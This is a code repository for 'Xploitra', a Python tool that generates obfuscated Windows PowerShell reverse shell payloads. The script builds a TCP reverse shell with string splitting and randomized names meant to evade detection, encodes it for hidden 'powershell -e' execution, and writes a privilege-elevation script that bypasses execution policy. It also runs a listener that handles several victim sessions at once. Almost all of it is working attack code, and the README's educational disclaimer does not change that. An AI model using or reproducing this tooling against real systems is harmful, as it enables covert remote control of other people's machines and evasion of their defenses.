├── README.md ├── Xploitra.py └── requirements.txt /README.md: -------------------------------------------------------------------------------- 1 | # Xploitra: Reverse Shell Payload Generator 2 | 3 | **Xploitra** is a versatile and powerful reverse shell payload generator tool designed for educational and security testing purposes. It allows users to generate reverse shell payloads with customizable options, leveraging various obfuscation techniques and session management. This tool is highly adaptable for simulating real-world attack scenarios and testing the security posture of systems. 4 | 5 | ## **Features** 6 | 7 | - **Payload Generation**: Creates obfuscated reverse shell payloads for Windows platforms. 8 | - **Cross-Platform**: The tool can generate the payload on any OS. 9 | - **Session Management**: Allows handling multiple reverse shell sessions concurrently. 10 | - **Obfuscation**: Uses randomized encoding and string manipulation techniques to bypass basic detection mechanisms. 11 | - **Payload Customization**: Modify IP, port, and payload execution commands for tailored payloads. 12 | - **Base64 Encoding**: Encodes the payload for easy delivery through secure channels. 13 | 14 | ## **Prerequisites** 15 | 16 | - **Python 3.7+** 17 | - **tqdm** (Progress bar functionality) 18 | 19 | ## **Installation** 20 | 21 | 1. **Clone the repository:** 22 | 23 | ```bash 24 | git clone https://github.com/AnonKryptiQuz/Xploitra.git 25 | cd Xploitra 26 | ``` 27 | 28 | 2. **Install the required packages:** 29 | 30 | ```bash 31 | pip install -r requirements.txt 32 | ``` 33 | 34 | **Ensure `requirements.txt` contains:** 35 | 36 | ```text 37 | tqdm==4.64.1 38 | ``` 39 | 40 | ## **Usage** 41 | 42 | 1. **Run the tool:** 43 | 44 | ```bash 45 | python Xploitra.py -l -p [-n ngrok] 46 | ``` 47 | 48 | 2. **Follow the prompts to configure and generate your reverse shell payload.** 49 | 50 | 3. **After generation, the payload will be saved as a `.bat` file, which is compatible with Windows systems.** 51 | 52 | ## **Disclaimer** 53 | 54 | - **Educational Purposes Only**: Xploitra is intended for educational and research use. The tool should not be used for illegal or malicious activities. It is the user’s responsibility to ensure compliance with local laws and regulations. 55 | 56 | ## **Author** 57 | 58 | **Created by:** [AnonKryptiQuz](https://AnonKryptiQuz.github.io/) 59 | -------------------------------------------------------------------------------- /Xploitra.py: -------------------------------------------------------------------------------- 1 | import random, time, uuid, base64, argparse, subprocess, string, logging, socket, threading, importlib, subprocess, os, platform 2 | from tqdm import tqdm 3 | 4 | def check_install_requirements(): 5 | try: 6 | importlib.import_module('tqdm') 7 | print("Requirements are already satisfied.") 8 | time.sleep(1) 9 | except ImportError: 10 | print("Installing the requirements...") 11 | pip_command = 'pip' if platform.system().lower() == 'windows' else 'pip3' 12 | subprocess.run([pip_command, 'install', '-r', '<(echo "tqdm==4.64.1")'], shell=True) 13 | print("Requirements installed.") 14 | 15 | def clear_screen(): 16 | os.system('cls' if platform.system().lower() == 'windows' else 'clear') 17 | 18 | check_install_requirements() 19 | 20 | clear_screen() 21 | 22 | parser = argparse.ArgumentParser(description="Script created by AnonKryptiQuz") 23 | parser.add_argument('-l', '-local', type=str, required=True, help='Local Machine') 24 | parser.add_argument('-p', '-port', type=int, default=4444, help='On What Port To Connect locally') 25 | parser.add_argument('-n', '-ngr', choices=["ngrok"], required=False, help="Ngrok tunnel") 26 | args = parser.parse_args() 27 | 28 | if args.p == 4444: 29 | print("\n[!] Note: The Default port is 4444.") 30 | time.sleep(0.5) 31 | 32 | logging.basicConfig(level=logging.INFO) 33 | logger = logging.getLogger(__name__) 34 | 35 | def generate_uuid(): 36 | random_uuid = ["$" + str(uuid.uuid4()) for _ in range(10)] 37 | random_uid_get = random.choice(random_uuid) 38 | time.sleep(0.7) 39 | return random_uid_get 40 | 41 | def spl_uuid(): 42 | uuids = generate_uuid() 43 | split_uuid = uuids.split("-")[0] 44 | return split_uuid 45 | 46 | def random_string(length): 47 | return ''.join(random.choice(string.ascii_letters) for _ in range(length)) 48 | 49 | def random_choice(variables): 50 | return {i: random_string(random.randrange(6, 12)) for i in range(variables)} 51 | 52 | strings = random_string(random.randrange(6, 12)) 53 | random_string_pickup = random_choice(variables=5) 54 | 55 | Command0 = ['$str = "TcP"+"C"+"li"+"e"+"nt";', '$reversed = -join ($str[-1..-($str.Length)])'] 56 | Command1 = ['$a = IEX $env:', 'SystemRoot\SysWow64\??ndowsPowerShe??', '\\v1.0\powershe??.exe;'] 57 | Command2 = ['$client = New-Object ', 'System.Net.Sockets.', 'TCPClient("0.0.0.0",0000)'] 58 | Command3 = ['$stream = ', '$client.GetStream();', '[byte[]]$bytes = 0..65535|%{0};'] 59 | Command4 = ['while(($i = $stream.Read($bytes, 0, $bytes.Length))', '-ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding)', '.GetString($bytes,0, $i);'] 60 | Command5 = ['$data = (New-Object -TypeName System.Text.ASCIIEncoding)', '.GetString($bytes,0, $i);'] 61 | 62 | WordCharSystem1 = ["SysTemROot", "Syste?????", "Syst??r??t", "SyS?em?oo?", "SYSTEmRoot", "Sys???r???"] 63 | WordCharSystem2 = ["SysWoW??", "SYSW?W6?", "SySwO???", "SYSW????"] 64 | WordCharSystem3 = ["Ne''w-O''bje''ct", "N''ew-O''bj''ec''t", "N'e'W'-'o'B'J'e'C'T'", 65 | "&('N'+'e'+'w'+'-'+'O'+'b'+'J'+'e'+'c'+'t')", "NeW-oB''JeCT", "&('New'+'-ObJect')", 66 | "&('N'+'e'+'w'+'-ObJect')", "&('New'+'-'+'Ob'+'je'+'ct')", "&('Ne'+'w'+'-'+'Ob'+'je'+'ct')", 67 | "&('n'+'E'+'W'+'-'+'Ob'+'Je'+'ct')", "&('New'+'-'+'Ob'+'je'+'c'+'t')"] 68 | WordCharSystem4 = ["Sy''st''em.Net.Soc''kets.TcPClIeNt", "SyS''tEm.Net.SoC''kE''tS.TCPCLIENT", 69 | "Sy''St''Em.NeT.So''CkE''tS.TCpCLient", "Sy''St''Em.NeT.So''CkE''tS.$str", 70 | "('S'+'y'+'s'+'t'+'e'+'m'+'.'+'N'+'e'+'t'+'.'+'S'+'ockets.TCPClient')", 71 | "('S'+'y'+'s'+'t'+'e'+'m'+'.'+'N'+'e'+'t'+'.'+'S'+'ockets.TCPcliEnt')", 72 | "('S'+'y'+'s'+'t'+'e'+'m'+'.'+'N'+'e'+'t'+'.'+'S'+'ockets'+'.'+$str)"] 73 | WordCharSystem5 = ["('Get'+'St'+'r'+'eam')", "('Get'+'Stream')", "('G'+'e'+'T'+'S'+'T'+'r'+'e'+'am')", 74 | "('gEt'+'s'+'T'+'r'+'E'+'aM')", "('G'+'e'+'tStream')", "('g'+'Et'+'s'+'T'+'r'+'E'+'aM')"] 75 | WordCharSystem6 = ["Sys''t''em.Te''xt.AS''CI''IEn''co''ding", "Sy''Ste''M.tExT.A''SCi''iEN''coding", 76 | "S'y's't'e'm.T'e'x't.'A'S'C'I'IE'n'c'o'd'i'n'g"] 77 | WordCharSystem7 = ["$41b394758330c8=$3757856aa482c79977", "$37f=$91a10810c37a0f=$946c88e=$ecf0bb86", 78 | "$b=$c=$9=$5=$d=$f=$c=$1=$4=$1=$4=$6=$a=$a=$2=$3=$e=$4=$3=$f=$2=$e=$a=$7=$a=$f=$0=$4=$d=$3=$1=$0", 79 | "$e=$7=$f=$c=$f=$8=$e=$4=$9=$e=$3=$9=$a=$f=$3=$c=$f=$6=$a=$f=$2=$4=$6=$f=$d=$c=$f=$5=$3=$5=$d=$f"] 80 | WordCharSystem8 = ["$3dbfe2ebffe072727949d7cecc51573b", "$b15ff490cfd2aa65358d2e5e376c5dd2", 81 | "$b91ae5f2a05e87e53ef4ca58305c600f", "$fb3c97733989bd69eede22507aab10df"] 82 | WordCharSystem9 = spl_uuid() 83 | 84 | C0, C1, C2, C3, C4, C5 = map(lambda cmd: ''.join(cmd).strip(), [Command0, Command1, Command2, Command3, Command4, Command5]) 85 | W, W2, w3 = ', '.join(WordCharSystem1), ', '.join(WordCharSystem2), '. '.join(WordCharSystem3) 86 | 87 | replacements = [random.choice(WordCharSystem1) if "SYSTEMROOT" in C1 or "SystemRoot" in C1 else None, 88 | random.choice(WordCharSystem2) if "SysWow64" in C1 else None, 89 | random.choice(WordCharSystem3) if "New-Object" in C2 else None, 90 | random.choice(WordCharSystem4) if "System.Net.Sockets" in C2 else None, 91 | random.choice(WordCharSystem5) if "GetStream" in C3 else None, 92 | random.choice(WordCharSystem6) if "System.Text.ASCIIEncoding" in C4 else None] 93 | 94 | repl, repl2, repl3, repl4, repl5, repl6 = replacements 95 | repl7 = repl8 = repl9 = None 96 | 97 | def Banner(): 98 | try: 99 | print("\nProgram made by AnonKryptiQuz. This tool is for educational purposes only.") 100 | print("\nCreating the payload, please wait") 101 | 102 | with open('Payload.bat', 'r') as file: 103 | spl = file.read() 104 | words_to_check = ["$client", "$sendback", "$data"] 105 | word_to_update = [repl7, repl8, repl9] 106 | num_words_to_check = len(words_to_check) 107 | 108 | exclusion_list = ["$client", "$sendback", "$data"] 109 | 110 | with tqdm(total=num_words_to_check, bar_format="{l_bar}{bar}{r_bar}") as pbar: 111 | for i, word in enumerate(words_to_check): 112 | pbar.update(1) 113 | time.sleep(0.001) 114 | if word not in spl and word not in exclusion_list: 115 | pbar.write(f"{i + 6}. {word} - Replaced -->> {word_to_update[i]}") 116 | time.sleep(1) 117 | 118 | print("\nThe payload has been Generated Successfully: \n") 119 | 120 | except Exception as e: 121 | logger.error(e) 122 | 123 | def Execute_privilege(): 124 | with open('Privilege.bat', 'w') as run: 125 | run.write(privilege) 126 | 127 | def Execute_Payload(): 128 | with open('Payload.bat', 'w') as run2: 129 | run2.write(f"{C0};\n") 130 | run2.write('''$PJ = @("54", "43", "50", "43", "6C", "69", "65", "6E", "74");\n''') 131 | run2.write("$TChar = $PJ | % { [char][convert]::ToInt32($_, 16) }; $PJChar = -join $TChar;\n") 132 | run2.write(f";${random_string_pickup[0]} = {repl3} {repl4}('{args.l}',{args.p});\n") 133 | run2.write(f"${random_string_pickup[2]} = ${random_string_pickup[0]}.{repl5}();" 134 | "[byte[]]$PJChar = 0..65535|%{0};\n") 135 | run2.write(f"while(($i = ${random_string_pickup[2]}.ReAd($PJChar, 0, $PJChar.LeNgTh)) -ne 0)" + "{;\n") 136 | run2.write(f"$data = ({repl3} -TypENAme {repl6}).('Ge'+'tStRinG')($PJChar,0, $i);\n") 137 | run2.write(f'$sendback = (iex ". {{ $data }} 2>&1" | Ou''t-Str''ing );\n') 138 | run2.write(f"$J=$O=$K=$E=$R=$P=$W=$R = ${{sendback}} + 'AnonymousShell ' + (pwd).Path + '> ';\n") 139 | run2.write('''$s = ("{0}{1}{3}{2}"-f "se''nd","by","e","t"); $s = ([text.encoding]::ASCii).GetBYTeS($R);\n''') 140 | run2.write(f"${random_string_pickup[2]}.Write($s,0,$s.Length);${random_string_pickup[2]}.Flush()" + "};" 141 | f"${random_string_pickup[0]}.Close()\n") 142 | 143 | def Change_Payload(x): 144 | global repl7, repl8, repl9 145 | repl7, repl8, repl9 = random.choice(WordCharSystem7), random.choice(WordCharSystem8), WordCharSystem9 146 | with open(x, "r") as file: 147 | file_content = file.read() 148 | for old, new in [("$client", repl7), ("$sendback", repl8), ("sendback", repl8.split("$")[1]), ("$data", repl9)]: 149 | file_content = file_content.replace(old, new) 150 | with open(x, 'w') as file: 151 | file.write(file_content) 152 | 153 | def Raw_Payload(x): 154 | with open(x, "r") as f: 155 | print(f.read()) 156 | 157 | def B64(FTD): 158 | with open(FTD, 'rb') as file: 159 | file_content = file.read() 160 | return base64.b64encode(file_content).decode('utf-8') 161 | 162 | def start_server(): 163 | sessions = {} 164 | hostname, port = ('0.0.0.0', args.p) if not args.n else ('0.0.0.0', int(input("[?] On which PORT to listen: "))) 165 | max_sessions = 5 166 | 167 | server_socket = socket.socket() 168 | server_socket.bind((hostname, port)) 169 | server_socket.listen(5) 170 | print(f"\n[Anonymous] Listening on {hostname}:{port}") 171 | 172 | def accept_connections(): 173 | nonlocal sessions 174 | while len(sessions) < max_sessions: 175 | client_socket, addr = server_socket.accept() 176 | session_id = len(sessions) + 1 177 | sessions[session_id] = [client_socket, addr] 178 | print(f"\nThe connection has been established successfully from {addr[0]}:{addr[1]}\n") 179 | 180 | def handle_buffer(client_socket): 181 | x = b'' 182 | while True: 183 | information = client_socket.recv(1024) 184 | x += information 185 | if len(information) < 1024: 186 | break 187 | return x 188 | 189 | threading.Thread(target=accept_connections, daemon=True).start() 190 | 191 | waiting_message_printed = False 192 | while True: 193 | if not sessions: 194 | if not waiting_message_printed: 195 | print(f"Waiting for the sessions...") 196 | waiting_message_printed = True 197 | continue 198 | elif waiting_message_printed: 199 | waiting_message_printed = False 200 | 201 | try: 202 | for session_id, (client_socket, session_addr) in sessions.items(): 203 | print(f"SESSION ID::{session_id}, {session_addr[0]}::{session_addr[1]}\n") 204 | print(f"You may use CTRL+C for switching between the sessions") 205 | print(f"Press zero [0] to Kill the sessions.\n") 206 | 207 | userinput = int(input(f"* Please choose a session between 1-{len(sessions)}): ")) 208 | if userinput == 0: 209 | print(f"\nCreated by AnonKryptiQuz") 210 | for _, (client_socket, _) in sessions.items(): 211 | client_socket.close() 212 | exit(0) 213 | 214 | if userinput in sessions: 215 | client_socket, addr = sessions[userinput] 216 | while True: 217 | try: 218 | command = input(f"{addr[0]}:{addr[1]} : [AnonymousSession] {userinput}> ") 219 | if command.lower() == "quit": 220 | client_socket.close() 221 | del sessions[userinput] 222 | logger.info(f"[!]User Session {userinput} lost!") 223 | break 224 | client_socket.send(command.encode()) 225 | response = handle_buffer(client_socket).decode('utf-8') 226 | print(response) 227 | 228 | except KeyboardInterrupt: 229 | print("\n[?]Switching sessions, please wait...") 230 | time.sleep(2) 231 | break 232 | except (ConnectionResetError, BrokenPipeError): 233 | logger.info(f"[!]User session {userinput} lost!") 234 | del sessions[userinput] 235 | break 236 | else: 237 | logger.error("Invalid session ID.") 238 | except ValueError: 239 | print("Please enter a valid session ID or '0' to exit.") 240 | 241 | privilege = f''' 242 | param([switch]$Elevated) 243 | 244 | function Test-Admin {{ 245 | $currentUser = New-Object Security.Principal.WindowsPrincipal $([Security.Principal.WindowsIdentity]::GetCurrent()) 246 | $currentUser.IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator) 247 | Unblock-File '.\Privilege.bat' 248 | }} 249 | 250 | if ((Test-Admin) -eq $false) {{ 251 | if ($elevated) {{ 252 | }} else {{ 253 | Start-Process $env:{repl}\\\\{repl2}\\\\??ndowsPowerShe??\\\\v1.0\\powershe??.exe -Verb RunAs -ArgumentList ('-noprofile -WindowStyle hidden -file "{0}" -elevated' -f ($myinvocation.MyCommand.Definition)) 254 | }} 255 | exit 256 | }} 257 | 258 | Set-ExecutionPolicy Bypass -Scope CurrentUser -Force 259 | $encodedCommand = 'BASE64_ENCODED_COMMAND_HERE' 260 | $decodedCommand = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encodedCommand)) 261 | Invoke-Expression $decodedCommand 262 | ''' 263 | 264 | def main(): 265 | Execute_privilege() 266 | Execute_Payload() 267 | Change_Payload("Payload.bat") 268 | Banner() 269 | FP = 'Payload.bat' 270 | B64(FTD=FP) 271 | time.sleep(0.5) 272 | print(f"* You may use powershell -w hidden -EncodedCommand [PAYLOAD]\n") 273 | command = "iconv -f ASCII -t UTF-16LE Payload.bat | base64 -w 0" 274 | base64_payload = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) 275 | base_bytes_out, base_err = base64_payload.communicate() 276 | encoded_command = base_bytes_out.decode('utf-8') 277 | print(f"powershell -e {encoded_command}") 278 | 279 | with open('akq.bat', 'w') as akq_file: 280 | akq_file.write(f"powershell -e {encoded_command}") 281 | 282 | time.sleep(0.5) 283 | start_server() 284 | 285 | if __name__ == '__main__': 286 | main() 287 | subprocess.Popen('rm -r Payload.bat', shell=True) 288 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | tqdm==4.64.1 2 | --------------------------------------------------------------------------------